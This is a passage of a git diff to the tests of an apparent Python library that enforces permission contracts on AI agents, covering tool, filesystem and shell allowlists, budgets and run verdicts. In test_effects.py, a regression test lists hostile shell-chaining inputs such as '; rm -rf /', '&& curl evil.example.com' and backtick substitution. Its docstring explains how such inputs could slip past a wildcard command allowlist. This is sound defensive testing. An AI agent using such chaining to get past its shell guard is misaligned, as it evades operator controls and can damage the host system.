errors: list = [] def call_many() -> None: @@ -112,13 +112,13 @@ def call_many() -> None: errors.append(True) threads = [threading.Thread(target=call_many) for _ in range(5)] - for t in threads: - t.start() - for t in threads: - t.join() + for thread in threads: + thread.start() + for thread in threads: + thread.join() - snap = tracker.snapshot() - assert snap.tool_calls == 5000 + assert not errors + assert tracker.snapshot().tool_calls == 5000 def test_budget_exceeded_error_fields(self) -> None: err = BudgetExceededError("cost_usd", 5.23, 5.00) diff --git a/tests/test_cli.py b/tests/test_cli.py index fda48bf..67338e9 100644 --- a/tests/test_cli.py +++ b/tests/test_cli.py @@ -2,6 +2,7 @@ from __future__ import annotations +import json from pathlib import Path from typing import Any, Dict @@ -13,112 +14,122 @@ @pytest.fixture -def runner(): +def runner() -> CliRunner: return CliRunner() @pytest.fixture def contract_file(tmp_path: Path, tier1_data: Dict[str, Any]) -> Path: - p = tmp_path / "contract.yaml" - p.write_text(yaml.dump(tier1_data, sort_keys=False), encoding="utf-8") - return p + path = tmp_path / "contract.yaml" + path.write_text(yaml.dump(tier1_data, sort_keys=False), encoding="utf-8") + return path class TestValidate: - def test_valid_contract(self, runner, contract_file) -> None: + def test_valid_contract(self, runner: CliRunner, contract_file: Path) -> None: result = runner.invoke(main, ["validate", str(contract_file)]) assert result.exit_code == 0 assert "PASSED" in result.output + assert "Coding/build surfaces" in result.output - def test_valid_contract_json(self, runner, contract_file) -> None: + def test_valid_contract_json(self, runner: CliRunner, contract_file: Path) -> None: result = runner.invoke(main, ["validate", str(contract_file), "--json-output"]) assert result.exit_code == 0 - import json data = json.loads(result.output) assert data["valid"] is True assert data["tier"] == 1 + assert data["coding_surfaces"]["filesystem_write"] == ["src/**", "tests/**"] - def test_invalid_contract(self, runner, tmp_path) -> None: + def test_invalid_contract(self, runner: CliRunner, tmp_path: Path) -> None: bad = tmp_path / "bad.yaml" bad.write_text(yaml.dump({"agent_contract": "bad"}, sort_keys=False), encoding="utf-8") result = runner.invoke(main, ["validate", str(bad)]) assert result.exit_code == 1 assert "FAILED" in result.output - def test_file_not_found(self, runner) -> None: - result = runner.invoke(main, ["validate", "/nonexistent.yaml"]) - assert result.exit_code != 0 - - def test_shows_recommendations(self, runner, tmp_path, tier0_data) -> None: - p = tmp_path / "tier0.yaml" - p.write_text(yaml.dump(tier0_data, sort_keys=False), encoding="utf-8") - result = runner.invoke(main, ["validate", str(p)]) + def test_shows_recommendations(self, runner: CliRunner, tmp_path: Path, tier0_data: Dict[str, Any]) -> None: + path = tmp_path / "tier0.yaml" + path.write_text(yaml.dump(tier0_data, sort_keys=False), encoding="utf-8") + result = runner.invoke(main, ["validate", str(path)]) assert result.exit_code == 0 assert "Recommendations" in result.output class TestCheckCompat: - def test_compatible(self, runner, contract_file) -> None: + def test_compatible(self, runner: CliRunner, contract_file: Path) -> None: result = runner.invoke(main, ["check-compat", str(contract_file), str(contract_file)]) assert result.exit_code == 0 - def test_json_output(self, runner, contract_file) -> None: + def test_json_output(self, runner: CliRunner, contract_file: Path) -> None: result = runner.invoke(main, ["check-compat", str(contract_file), str(contract_file), "-j"]) assert result.exit_code == 0 - import json - data = json.loads(result.output) - assert "compatible" in data + assert "compatible" in json.loads(result.output) class TestInit: - def test_template_generation(self, runner) -> None: + def test_template_generation(self, runner: CliRunner) -> None: result = runner.invoke(main, ["init", "--name", "test-agent"]) assert result.exit_code == 0 assert "test-agent" in result.output assert "postconditions" in result.output - def test_output_to_file(self, runner, tmp_path) -> None: + def test_coding_template_generation(self, runner: CliRunner) -> None: + result = runner.invoke(main, ["init", "--template", "coding"]) + assert result.exit_code == 0 + assert "filesystem:" in result.output + assert "run_artifact_path" in result.output + + def test_output_to_file(self, runner: CliRunner, tmp_path: Path) -> None: out = tmp_path / "generated.yaml" result = runner.invoke(main, ["init", "--name", "test", "-o", str(out)]) assert result.exit_code == 0 assert out.exists() - def test_from_trace(self, runner, tmp_path) -> None: + def test_from_trace(self, runner: CliRunner, tmp_path: Path) -> None: trace_file = tmp_path / "traces.jsonl" traces = [ - {"agent": {"name": "trace-agent", "version": "1.0.0"}, - "tool_calls": [{"name": "search"}, {"name": "database.read"}], - "usage": {"cost_usd": 0.05, "total_tokens": 500}, - "duration_seconds": 2.5}, + { + "agent": {"name": "trace-agent", "version": "1.0.0"}, + "tool_calls": [{"name": "search"}, {"name": "database.read"}], + "shell_commands": ["python -m pytest tests/test_app.py"], + "filesystem": {"read": ["src/app.py"], "write": ["tests/test_app.py"]}, + "usage": {"cost_usd": 0.05, "total_tokens": 500}, + "duration_seconds": 2.5, + }, ] - trace_file.write_text( - "\n".join(__import__("json").dumps(t) for t in traces), - encoding="utf-8", - ) + trace_file.write_text("\n".join(json.dumps(t) for t in traces), encoding="utf-8") result = runner.invoke(main, ["init", "--from-trace", str(trace_file)]) assert result.exit_code == 0 assert "trace-agent" in result.output - assert "search" in result.output + assert "filesystem" in result.output + assert "shell" in result.output + + +class TestCheckVerdict: + def test_pass(self, runner: CliRunner, tmp_path: Path) -> None: + verdict = tmp_path / "verdict.json" + verdict.write_text(json.dumps({"outcome": "pass", "final_gate": "allowed", "checks": []}), encoding="utf-8") + result = runner.invoke(main, ["check-verdict", str(verdict)]) + assert result.exit_code == 0 + assert "Outcome: pass" in result.output + + def test_fail(self, runner: CliRunner, tmp_path: Path) -> None: + verdict = tmp_path / "verdict.json" + verdict.write_text(json.dumps({"outcome": "fail", "final_gate": "failed", "checks": []}), encoding="utf-8") + result = runner.invoke(main, ["check-verdict", str(verdict)]) + assert result.exit_code == 1 class TestTestCommand: - def test_no_eval_suite(self, runner, contract_file) -> None: + def test_no_eval_suite(self, runner: CliRunner, contract_file: Path) -> None: result = runner.invoke(main, ["test", str(contract_file)]) assert result.exit_code == 0 assert "Postconditions" in result.output - def test_with_eval_suite(self, runner, contract_file, tmp_path) -> None: + def test_with_eval_suite(self, runner: CliRunner, contract_file: Path, tmp_path: Path) -> None: eval_dir = tmp_path / "evals" eval_dir.mkdir() eval_file = eval_dir / "basic.jsonl" - import json - cases = [ - {"output": {"status": "ok"}}, - {"output": None}, - ] - eval_file.write_text( - "\n".join(json.dumps(c) for c in cases), encoding="utf-8" - ) + eval_file.write_text("\n".join(json.dumps(c) for c in [{"output": {"status": "ok"}}, {"output": None}]), encoding="utf-8") result = runner.invoke(main, ["test", str(contract_file), "--eval-suite", str(eval_dir)]) - # At least one should pass (non-None output), one may fail assert "Results:" in result.output diff --git a/tests/test_composition.py b/tests/test_composition.py index a4c13d5..21821d0 100644 --- a/tests/test_composition.py +++ b/tests/test_composition.py @@ -20,7 +20,7 @@ def test_compatible_contracts(self, tmp_yaml, tier2_data: Dict[str, Any]) -> Non "authorized": {"tools": ["search"], "network": [], "state_writes": []}, "declared": {"tools": ["search"], "network": [], "state_writes": []}, }, - "resources": {"budgets": {"max_cost_usd": 0.25, "max_tokens": 5000, "max_tool_calls": 10, "max_duration_seconds": 15.0}}, + "resources": {"budgets": {"max_cost_usd": 0.25, "max_tokens": 5000, "max_tool_calls": 10, "max_duration_seconds": 15.0, "max_shell_commands": 3}}, "delegation": { "max_depth": 1, "allowed_agents": [], diff --git a/tests/test_effects.py b/tests/test_effects.py index 3a18848..f826bf4 100644 --- a/tests/test_effects.py +++ b/tests/test_effects.py @@ -7,64 +7,121 @@ from agent_contracts.effects import ( EffectDeniedError, EffectGuard, + ShellMetacharacterError, intersect_authorized, union_declared, validate_declared_subset, ) -from agent_contracts.types import EffectsAuthorized, EffectsDeclared +from agent_contracts.types import ( + EffectsAuthorized, + EffectsDeclared, + FilesystemAuthorization, + ShellAuthorization, +) class TestEffectGuard: def test_no_config_allows_all(self) -> None: guard = EffectGuard() assert guard.check_tool("anything") is True + assert guard.check_file_read("secret.txt") is True + assert guard.check_shell_command("rm -rf /") is True assert not guard.is_configured def test_configured_allows_listed_tool(self) -> None: - auth = EffectsAuthorized(tools=["search", "database.read"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=["search", "database.read"])) assert guard.check_tool("search") is True assert guard.check_tool("database.read") is True def test_configured_denies_unlisted_tool(self) -> None: - auth = EffectsAuthorized(tools=["search"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=["search"])) assert guard.check_tool("delete_all") is False def test_glob_pattern_matching(self) -> None: - auth = EffectsAuthorized(tools=["database.*", "api.user.*"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=["database.*", "api.user.*"])) assert guard.check_tool("database.read") is True assert guard.check_tool("database.write") is True assert guard.check_tool("api.user.get") is True assert guard.check_tool("api.admin.delete") is False def test_require_tool_raises(self) -> None: - auth = EffectsAuthorized(tools=["search"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=["search"])) with pytest.raises(EffectDeniedError, match="tool 'delete'"): guard.require_tool("delete") - def test_require_tool_passes(self) -> None: - auth = EffectsAuthorized(tools=["search"]) - guard = EffectGuard(auth) - guard.require_tool("search") # Should not raise - def test_network_check(self) -> None: - auth = EffectsAuthorized(network=["https://api.example.com/*"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(network=["https://api.example.com/*"])) assert guard.check_network("https://api.example.com/search") is True assert guard.check_network("https://evil.com/data") is False def test_state_write_check(self) -> None: - auth = EffectsAuthorized(state_writes=["tickets.*"]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(state_writes=["tickets.*"])) assert guard.check_state_write("tickets.status") is True assert guard.check_state_write("users.password") is False + def test_filesystem_checks(self) -> None: + guard = EffectGuard( + EffectsAuthorized(filesystem=FilesystemAuthorization(read=["src/**"], write=["src/**"])) + ) + assert guard.check_file_read("src/main.py") is True + assert guard.check_file_write("src/main.py") is True + assert guard.check_file_write("tests/test_main.py") is False + + def test_shell_command_checks(self) -> None: + guard = EffectGuard( + EffectsAuthorized(shell=ShellAuthorization(commands=["python -m pytest *"])) + ) + assert guard.check_shell_command("python -m pytest tests/test_app.py") is True + assert guard.check_shell_command("python -m mypy src") is False + + @pytest.mark.parametrize( + "command", + [ + "python -m pytest tests/ ; rm -rf /", + "python -m pytest tests/ && curl evil.example.com", + "python -m pytest tests/ || echo pwned", + "python -m pytest tests/ | cat /etc/passwd", + "python -m pytest tests/ > /etc/hosts", + "python -m pytest tests/ < /dev/urandom", + "python -m pytest tests/ >> /var/log/owned", + "python -m pytest $(echo tests)", + "python -m pytest `whoami`", + "python -m pytest tests/\nrm -rf /", + "python -m pytest tests/ &", + ], + ) + def test_shell_metacharacter_bypass_denied(self, command: str) -> None: + """Regression: fnmatch's `*` wildcard would otherwise consume shell + operators and let an attacker append payloads after an allowlisted + prefix. The strict reject must catch every chaining vector.""" + guard = EffectGuard( + EffectsAuthorized(shell=ShellAuthorization(commands=["python -m pytest *"])) + ) + assert guard.check_shell_command(command) is False + with pytest.raises(ShellMetacharacterError) as exc_info: + guard.require_shell_command(command) + assert "metacharacter" in str(exc_info.value) + + def test_shell_metacharacter_error_is_effect_denied(self) -> None: + """ShellMetacharacterError must be catchable as EffectDeniedError so + existing handlers keep working.""" + guard = EffectGuard( + EffectsAuthorized(shell=ShellAuthorization(commands=["python -m pytest *"])) + ) + with pytest.raises(EffectDeniedError): + guard.require_shell_command("python -m pytest tests/ ; rm -rf /") + + def test_shell_metachar_introspection(self) -> None: + guard = EffectGuard( + EffectsAuthorized(shell=ShellAuthorization(commands=["python -m pytest *"])) + ) + assert guard.shell_command_metachar("python -m pytest tests/") is None + assert guard.shell_command_metachar("python -m pytest a ; b") == ";" + assert guard.shell_command_metachar("python -m pytest $(b)") == "$(" + assert guard.shell_command_metachar("python -m pytest a\nb") == "\n" + def test_empty_allowlist_denies_all(self) -> None: - auth = EffectsAuthorized(tools=[], network=[], state_writes=[]) - guard = EffectGuard(auth) + guard = EffectGuard(EffectsAuthorized(tools=[], network=[], state_writes=[])) assert guard.check_tool("anything") is False assert guard.is_configured @@ -85,34 +142,38 @@ def test_glob_intersection(self) -> None: assert "database.write" in result.tools assert "admin.delete" not in result.tools - def test_empty_parent_denies_all(self) -> None: - parent = EffectsAuthorized(tools=[]) - child = EffectsAuthorized(tools=["search", "read"]) + def test_filesystem_and_shell_intersection(self) -> None: + parent = EffectsAuthorized( + filesystem=FilesystemAuthorization(read=["src/**"], write=["src/**"]), + shell=ShellAuthorization(commands=["python -m pytest *", "python -m ruff check *"]), + ) + child = EffectsAuthorized( + filesystem=FilesystemAuthorization(read=["src/**", "tests/**"], write=["tests/**"]), + shell=ShellAuthorization(commands=["python -m pytest tests/*", "python -m mypy *"]), + ) result = intersect_authorized(parent, child) - assert result.tools == [] + assert result.filesystem is not None + assert result.filesystem.read == ["src/**"] + assert result.filesystem.write == [] + assert result.shell is not None + assert result.shell.commands == ["python -m pytest tests/*"] class TestUnionDeclared: def test_basic_union(self) -> None: - a = EffectsDeclared(tools=["search"], network=["https://a.com"]) - b = EffectsDeclared(tools=["write"], network=["https://b.com"]) - result = union_declared(a, b) + result = union_declared( + EffectsDeclared(tools=["search"], network=["https://a.com"]), + EffectsDeclared(tools=["write"], network=["https://b.com"]), + ) assert set(result.tools) == {"search", "write"} assert set(result.network) == {"https://a.com", "https://b.com"} - def test_deduplication(self) -> None: - a = EffectsDeclared(tools=["search", "read"]) - b = EffectsDeclared(tools=["search", "write"]) - result = union_declared(a, b) - assert result.tools == ["search", "read", "write"] - class TestValidateDeclaredSubset: def test_valid_subset(self) -> None: declared = EffectsDeclared(tools=["search"]) authorized = EffectsAuthorized(tools=["search", "database.*"]) - violations = validate_declared_subset(declared, authorized) - assert violations == [] + assert validate_declared_subset(declared, authorized) == [] def test_invalid_tool(self) -> None: declared = EffectsDeclared(tools=["search", "delete_all"]) @@ -120,9 +181,3 @@ def test_invalid_tool(self) -> None: violations = validate_declared_subset(declared, authorized) assert len(violations) == 1 assert "delete_all" in violations[0] - - def test_glob_matching(self) -> None: - declared = EffectsDeclared(tools=["database.read"]) - authorized = EffectsAuthorized(tools=["database.*"]) - violations = validate_declared_subset(declared, authorized) - assert violations == [] diff --git a/tests/test_enforcer.py b/tests/test_enforcer.py index a707893..1c45a0e 100644 --- a/tests/test_enforcer.py +++ b/tests/test_enforcer.py @@ -2,96 +2,160 @@ from __future__ import annotations +import json +from pathlib import Path from typing import Any, Dict import pytest -from agent_contracts.enforcer import ContractEnforcer, ContractViolation, enforce_contract +from agent_contracts.enforcer import ( + ContractEnforcer, + ContractViolation, + enforce_contract, + load_verdict_artifact, +) from agent_contracts.loader import load_contract +from agent_contracts.postconditions import PostconditionError @pytest.fixture def enforcer_tier1(tmp_yaml, tier1_data: Dict[str, Any]): - """ContractEnforcer with a Tier 1 contract.""" - path = tmp_yaml(tier1_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier1_data)) return ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) +@pytest.fixture +def coding_contract_data() -> Dict[str, Any]: + return { + "agent_contract": "0.1.0", + "identity": {"name": "repo-build-agent", "version": "0.1.0"}, + "contract": { + "postconditions": [ + { + "name": "repo_checks_green", + "check": "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0", + "enforcement": "sync_block", + "severity": "critical", + } + ] + }, + "effects": { + "authorized": { + "tools": [], + "network": [], + "state_writes": [], + "filesystem": { + "read": ["src/**", "tests/**", "README.md"], + "write": ["src/**"], + }, + "shell": {"commands": ["python -m pytest *"]}, + } + }, + "resources": {"budgets": {"max_shell_commands": 1}}, + "observability": {"run_artifact_path": ".agent-contracts/runs/{run_id}/verdict.json"}, + } + + class TestContractEnforcer: def test_authorized_tool_passes(self, enforcer_tier1) -> None: - enforcer_tier1.check_tool_call("search") # In allowlist + enforcer_tier1.check_tool_call("search") def test_unauthorized_tool_raises(self, enforcer_tier1) -> None: with pytest.raises(ContractViolation, match="not authorized"): enforcer_tier1.check_tool_call("delete_everything") - def test_tool_call_budget(self, tmp_yaml, tier1_data) -> None: - tier1_data["resources"]["budgets"]["max_tool_calls"] = 2 - path = tmp_yaml(tier1_data) - contract = load_contract(path) - enforcer = ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) - enforcer.check_tool_call("search") - enforcer.check_tool_call("database.read") - with pytest.raises(ContractViolation, match="tool_calls"): - enforcer.check_tool_call("search") + def test_file_write_blocked(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract_path = tmp_yaml(coding_contract_data) + contract = load_contract(contract_path) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + with pytest.raises(ContractViolation, match="File write"): + enforcer.check_file_write("tests/test_app.py") + verdict = enforcer.finalize_run() + assert verdict.outcome == "blocked" + assert Path(verdict.artifacts["verdict_path"]).exists() + loaded = load_verdict_artifact(verdict.artifacts["verdict_path"]) + assert loaded["outcome"] == "blocked" + + def test_shell_command_blocked(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + with pytest.raises(ContractViolation, match="Shell command"): + enforcer.check_shell_command("python -m mypy src") + assert enforcer.finalize_run().outcome == "blocked" + + def test_shell_command_budget(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + enforcer.check_shell_command("python -m pytest tests/test_app.py") + with pytest.raises(ContractViolation, match="shell_commands"): + enforcer.check_shell_command("python -m pytest tests/test_other.py") + + def test_fail_verdict_when_required_checks_fail(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + enforcer.record_check("pytest", "fail", exit_code=1) + enforcer.record_check("ruff", "pass", exit_code=0) + verdict = enforcer.finalize_run(output={"status": "done"}) + assert verdict.outcome == "fail" + assert verdict.final_gate == "failed" + assert any(v["violated_clause"] == "contract.postconditions.repo_checks_green" for v in verdict.violations) + + def test_pass_verdict_writes_artifact(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + enforcer = ContractEnforcer(contract, repo_root=tmp_path) + enforcer.record_check("pytest", "pass", exit_code=0) + enforcer.record_check("ruff", "pass", exit_code=0) + verdict = enforcer.finalize_run(output={"status": "done"}) + assert verdict.outcome == "pass" + verdict_path = Path(verdict.artifacts["verdict_path"]) + assert verdict_path.exists() + payload = json.loads(verdict_path.read_text(encoding="utf-8")) + assert payload["final_gate"] == "allowed" + assert payload["budgets"]["shell_commands"] == 0 def test_cost_budget(self, enforcer_tier1) -> None: enforcer_tier1.add_cost(0.30) enforcer_tier1.add_cost(0.15) with pytest.raises(ContractViolation, match="cost_usd"): - enforcer_tier1.add_cost(0.10) # Total 0.55 > 0.50 limit + enforcer_tier1.add_cost(0.10) def test_token_budget(self, tmp_yaml, tier1_data) -> None: tier1_data["resources"]["budgets"]["max_tokens"] = 1000 - path = tmp_yaml(tier1_data) - contract = load_contract(path) - enforcer = ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) + enforcer = ContractEnforcer(load_contract(tmp_yaml(tier1_data)), violation_destination="callback", violation_callback=lambda e: None) enforcer.add_tokens(800) with pytest.raises(ContractViolation, match="tokens"): enforcer.add_tokens(300) def test_input_validation(self, enforcer_tier1) -> None: - errors = enforcer_tier1.validate_input({"query": "hello"}) - assert errors == [] + assert enforcer_tier1.validate_input({"query": "hello"}) == [] def test_input_validation_failure(self, enforcer_tier1) -> None: - errors = enforcer_tier1.validate_input({"query": 123}) # Should be string - assert len(errors) > 0 + assert enforcer_tier1.validate_input({"query": 123}) def test_output_validation(self, enforcer_tier1) -> None: - errors = enforcer_tier1.validate_output({"result": "answer"}) - assert errors == [] - - def test_postcondition_evaluation(self, enforcer_tier1) -> None: - results = enforcer_tier1.evaluate_postconditions({"status": "ok"}) - assert len(results) == 1 - assert results[0].passed is True + assert enforcer_tier1.validate_output({"result": "answer"}) == [] def test_violations_accumulated(self, tmp_yaml, tier1_data) -> None: - path = tmp_yaml(tier1_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier1_data)) events = [] - enforcer = ContractEnforcer( - contract, violation_destination="callback", violation_callback=lambda e: events.append(e) - ) - try: + enforcer = ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: events.append(e)) + with pytest.raises(ContractViolation): enforcer.check_tool_call("unauthorized_tool") - except ContractViolation: - pass assert len(enforcer.violations) == 1 + assert len(events) == 1 - def test_context_manager(self, tmp_yaml, tier1_data) -> None: - path = tmp_yaml(tier1_data) - contract = load_contract(path) - with ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) as enforcer: - enforcer.check_tool_call("search") + def test_context_manager_finalizes(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + with ContractEnforcer(contract, repo_root=tmp_path) as enforcer: + enforcer.record_check("pytest", "pass", exit_code=0) + enforcer.record_check("ruff", "pass", exit_code=0) + enforcer.finalize_run(output={"status": "done"}) + assert enforcer.artifact_path is not None + assert enforcer.artifact_path.exists() def test_no_effects_allows_all(self, tmp_yaml, tier0_data) -> None: - path = tmp_yaml(tier0_data) - contract = load_contract(path) - enforcer = ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) - enforcer.check_tool_call("anything") # No effects configured = allow all + enforcer = ContractEnforcer(load_contract(tmp_yaml(tier0_data)), violation_destination="callback", violation_callback=lambda e: None) + enforcer.check_tool_call("anything") class TestEnforceContractDecorator: @@ -102,8 +166,7 @@ def test_decorator_basic(self, tmp_yaml, tier0_data) -> None: def my_agent(query: str, _enforcer: Any = None) -> str: return "result" - result = my_agent("hello") - assert result == "result" + assert my_agent("hello") == "result" def test_decorator_postcondition_fail(self, tmp_yaml) -> None: data = { @@ -121,7 +184,5 @@ def test_decorator_postcondition_fail(self, tmp_yaml) -> None: def bad_agent(query: str, _enforcer: Any = None) -> None: return None - from agent_contracts.postconditions import PostconditionError - with pytest.raises(PostconditionError): bad_agent("hello") diff --git a/tests/test_init_from_trace.py b/tests/test_init_from_trace.py index d7a8e0f..66b7dcb 100644 --- a/tests/test_init_from_trace.py +++ b/tests/test_init_from_trace.py @@ -7,71 +7,72 @@ import yaml -from agent_contracts.init_from_trace import ( - generate_contract_from_traces, - generate_contract_yaml, -) +from agent_contracts.init_from_trace import generate_contract_from_traces, generate_contract_yaml class TestGenerateFromTraces: def _write_traces(self, tmp_path: Path, traces: list) -> Path: - p = tmp_path / "traces.jsonl" - p.write_text("\n".join(json.dumps(t) for t in traces), encoding="utf-8") - return p + path = tmp_path / "traces.jsonl" + path.write_text("\n".join(json.dumps(t) for t in traces), encoding="utf-8") + return path def test_extracts_tools(self, tmp_path: Path) -> None: traces = [ {"tool_calls": [{"name": "search"}, {"name": "database.read"}]}, {"tool_calls": [{"name": "search"}, {"name": "api.call"}]}, ] - path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, traces)) tools = result["effects"]["authorized"]["tools"] assert "search" in tools assert "database.read" in tools assert "api.call" in tools + def test_extracts_filesystem_and_shell(self, tmp_path: Path) -> None: + traces = [ + { + "filesystem": {"read": ["src/app.py"], "write": ["tests/test_app.py"]}, + "shell_commands": ["python -m pytest tests/test_app.py"], + } + ] + result = generate_contract_from_traces(self._write_traces(tmp_path, traces)) + authorized = result["effects"]["authorized"] + assert authorized["filesystem"]["read"] == ["src/**"] + assert authorized["filesystem"]["write"] == ["tests/**"] + assert authorized["shell"]["commands"] == ["python -m pytest tests/test_app.py"] + def test_extracts_budgets(self, tmp_path: Path) -> None: traces = [ - {"usage": {"cost_usd": 0.10, "total_tokens": 1000}, "duration_seconds": 5.0, - "tool_calls": [{"name": "a"}, {"name": "b"}]}, - {"usage": {"cost_usd": 0.20, "total_tokens": 2000}, "duration_seconds": 10.0, - "tool_calls": [{"name": "a"}]}, + {"usage": {"cost_usd": 0.10, "total_tokens": 1000}, "duration_seconds": 5.0, "tool_calls": [{"name": "a"}, {"name": "b"}], "shell_commands": ["pytest"]}, + {"usage": {"cost_usd": 0.20, "total_tokens": 2000}, "duration_seconds": 10.0, "tool_calls": [{"name": "a"}], "shell_commands": ["pytest", "ruff"]}, ] - path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, traces)) budgets = result["resources"]["budgets"] - assert budgets["max_cost_usd"] == 0.24 # 0.20 * 1.2 - assert budgets["max_tokens"] == 2400 # 2000 * 1.2 + assert budgets["max_cost_usd"] == 0.24 + assert budgets["max_tokens"] == 2400 + assert budgets["max_shell_commands"] == 3 def test_extracts_identity(self, tmp_path: Path) -> None: traces = [{"agent": {"name": "my-agent", "version": "2.0.0"}, "tool_calls": []}] - path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, traces)) assert result["identity"]["name"] == "my-agent" assert result["identity"]["version"] == "2.0.0" def test_name_override(self, tmp_path: Path) -> None: traces = [{"agent": {"name": "original", "version": "1.0.0"}, "tool_calls": []}] - path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path, agent_name="override") + result = generate_contract_from_traces(self._write_traces(tmp_path, traces), agent_name="override") assert result["identity"]["name"] == "override" def test_always_has_postcondition(self, tmp_path: Path) -> None: - traces = [{"tool_calls": []}] - path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, [{"tool_calls": []}])) assert len(result["contract"]["postconditions"]) >= 1 def test_yaml_output(self, tmp_path: Path) -> None: traces = [{"tool_calls": [{"name": "search"}], "usage": {"cost_usd": 0.01, "total_tokens": 100}}] - path = self._write_traces(tmp_path, traces) - yaml_str = generate_contract_yaml(path) - parsed = yaml.safe_load(yaml_str) + parsed = yaml.safe_load(generate_contract_yaml(self._write_traces(tmp_path, traces))) assert parsed["agent_contract"] == "0.1.0" + assert parsed["observability"]["run_artifact_path"] == ".agent-contracts/runs/{run_id}/verdict.json" def test_empty_traces(self, tmp_path: Path) -> None: - path = self._write_traces(tmp_path, []) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, [])) assert result["identity"]["name"] == "unnamed-agent" - assert "effects" not in result # No tools observed + assert "effects" in result diff --git a/tests/test_loader.py b/tests/test_loader.py index cce2715..3078524 100644 --- a/tests/test_loader.py +++ b/tests/test_loader.py @@ -40,16 +40,13 @@ def test_non_mapping_yaml(self, tmp_path: Path) -> None: class TestValidateContract: def test_valid_tier0(self, tier0_data: Dict[str, Any]) -> None: - errors = validate_contract(tier0_data) - assert errors == [] + assert validate_contract(tier0_data) == [] def test_valid_tier1(self, tier1_data: Dict[str, Any]) -> None: - errors = validate_contract(tier1_data) - assert errors == [] + assert validate_contract(tier1_data) == [] def test_valid_tier2(self, tier2_data: Dict[str, Any]) -> None: - errors = validate_contract(tier2_data) - assert errors == [] + assert validate_contract(tier2_data) == [] def test_missing_identity(self) -> None: data = { @@ -57,7 +54,7 @@ def test_missing_identity(self) -> None: "contract": {"postconditions": [{"name": "x", "check": "true"}]}, } errors = validate_contract(data) - assert any("identity" in e for e in errors) + assert any("identity" in error for error in errors) def test_missing_postconditions(self) -> None: data = { @@ -66,7 +63,7 @@ def test_missing_postconditions(self) -> None: "contract": {"postconditions": []}, } errors = validate_contract(data) - assert any("postconditions" in e for e in errors) + assert any("postconditions" in error for error in errors) def test_invalid_version_format(self) -> None: data = { @@ -75,18 +72,16 @@ def test_invalid_version_format(self) -> None: "contract": {"postconditions": [{"name": "x", "check": "true"}]}, } errors = validate_contract(data) - assert any("agent_contract" in e for e in errors) + assert any("agent_contract" in error for error in errors) def test_x_extension_allowed(self, tier0_data: Dict[str, Any]) -> None: tier0_data["x-custom-field"] = {"hello": "world"} - errors = validate_contract(tier0_data) - assert errors == [] + assert validate_contract(tier0_data) == [] class TestLoadContract: def test_load_tier0(self, tmp_yaml, tier0_data: Dict[str, Any]) -> None: - path = tmp_yaml(tier0_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier0_data)) assert contract.tier == 0 assert contract.identity.name == "test-agent" assert contract.identity.version == "1.0.0" @@ -94,17 +89,20 @@ def test_load_tier0(self, tmp_yaml, tier0_data: Dict[str, Any]) -> None: assert contract.postconditions[0].name == "has_output" def test_load_tier1(self, tmp_yaml, tier1_data: Dict[str, Any]) -> None: - path = tmp_yaml(tier1_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier1_data)) assert contract.tier == 1 assert contract.budgets is not None assert contract.budgets.max_cost_usd == 0.50 + assert contract.budgets.max_shell_commands == 5 assert contract.effects_authorized is not None assert "search" in contract.effects_authorized.tools + assert contract.effects_authorized.filesystem is not None + assert contract.effects_authorized.filesystem.write == ["src/**", "tests/**"] + assert contract.effects_authorized.shell is not None + assert "python -m pytest *" in contract.effects_authorized.shell.commands def test_load_tier2(self, tmp_yaml, tier2_data: Dict[str, Any]) -> None: - path = tmp_yaml(tier2_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier2_data)) assert contract.tier == 2 assert contract.failure_model is not None assert len(contract.failure_model.errors) == 2 @@ -114,6 +112,13 @@ def test_load_tier2(self, tmp_yaml, tier2_data: Dict[str, Any]) -> None: assert contract.slo is not None assert contract.slo.contract_satisfaction_rate is not None assert contract.slo.contract_satisfaction_rate.target == 0.995 + assert contract.observability is not None + assert contract.observability.run_artifact_path == ".agent-contracts/runs/{run_id}/verdict.json" + + def test_source_path_preserved(self, tmp_yaml, tier0_data: Dict[str, Any]) -> None: + path = 